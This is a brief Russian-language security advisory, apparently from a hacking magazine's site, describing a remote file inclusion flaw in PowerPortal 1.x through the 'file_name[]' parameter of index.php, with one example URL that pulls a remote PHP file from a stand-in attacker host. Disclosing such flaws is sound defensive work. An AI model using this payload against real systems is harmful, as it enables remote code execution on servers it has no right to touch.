Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: PowerPortal 1.x
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "file_name[]" сценарием index.php.
Пример:
http://localhost/path_to_PowerPortal/index.php?file_name[]=http://eivlCode.txt?